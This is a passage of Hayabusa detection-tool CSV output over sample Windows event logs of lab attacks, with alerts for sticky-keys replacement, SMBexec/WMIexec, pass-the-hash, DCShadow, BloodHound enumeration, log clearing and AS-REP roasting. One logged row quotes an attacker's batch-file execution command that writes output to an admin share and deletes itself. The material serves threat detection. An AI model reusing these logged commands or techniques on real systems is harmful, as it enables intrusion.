C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx 2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx 2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx 2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" 2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx 2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 